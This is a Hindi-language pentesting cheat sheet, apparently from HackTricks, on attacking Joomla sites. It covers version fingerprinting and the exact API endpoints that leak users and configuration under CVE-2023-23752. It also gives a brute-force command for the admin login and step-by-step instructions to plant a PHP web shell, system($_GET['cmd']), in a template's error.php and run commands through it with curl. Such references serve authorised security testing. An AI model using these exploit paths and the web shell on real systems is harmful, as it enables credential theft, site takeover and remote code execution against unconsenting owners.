Joomla

जीरो से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert) के साथ!

जूमला आंकड़े

जूमला कुछ गैर-पहचानी उपयोग सांख्यिकी जमा करता है जैसे जूमला, PHP और डेटाबेस संस्करण और जूमला स्थापनाओं पर उपयोग में सर्वर ऑपरेटिंग सिस्टम का विवरण। इस डेटा को उनके सार्वजनिक API के माध्यम से क्वेरी किया जा सकता है।

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

जांच

खोज/फुटप्रिंटिंग

  • मेटा की जांच करें

curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />
  • रोबोट्स.टेक्स्ट

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
  • README.txt

1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

संस्करण

  • /administrator/manifests/files/joomla.xml में आप संस्करण देख सकते हैं।

  • /language/en-GB/en-GB.xml में जूमला का संस्करण प्राप्त कर सकते हैं।

  • plugins/system/cache/cache.xml में लगभग संस्करण देख सकते हैं।

droopescan scan joomla --url http://joomla-site.local/

API अनअथेंटिकेटेड जानकारी लीक:

संस्करण 4.0.0 से 4.2.7 तक Unauthenticated जानकारी लीक (CVE-2023-23752) के लिए वंर्नरबल है जो क्रेडेंशियल्स और अन्य जानकारी को डंप करेगा।

  • उपयोगकर्ता: http://<host>/api/v1/users?public=true

  • कॉन्फ़िग फ़ाइल: http://<host>/api/index.php/v1/config/application?public=true

MSF मॉड्यूल: scanner/http/joomla_api_improper_access_checks या रूबी स्क्रिप्ट: 51334

ब्रूट-फ़ोर्स

आप लॉगिन को ब्रूट फ़ोर्स करने के लिए इस स्क्रिप्ट का उपयोग कर सकते हैं।

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

यदि आपने व्यवस्थापक क्रेडेंशियल प्राप्त किए हैं तो आप एक स्निपेट PHP कोड जोड़कर इसमें RCE प्राप्त कर सकते हैं। हम इसे एक टेम्पलेट को कस्टमाइज़ करके कर सकते हैं।

  1. Configuration के नीचे Templates पर क्लिक करें ताकि टेम्पलेट मेनू खुले।

  2. Template स्तंभ के तहत protostar का चयन करें। यह हमें Templates: Customise पृष्ठ पर ले जाएगा।

  3. अंततः, आप पृष्ठ स्रोत खोलने के लिए पृष्ठ पर क्लिक कर सकते हैं। हम error.php पृष्ठ का चयन करेंगे। हम निम्नलिखित रूप में PHP वन-लाइनर जोड़ेंगे ताकि कोड निष्पादन प्राप्त करें:

  4. system($_GET['cmd']);

  5. सहेजें और बंद करें

  6. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

Last updated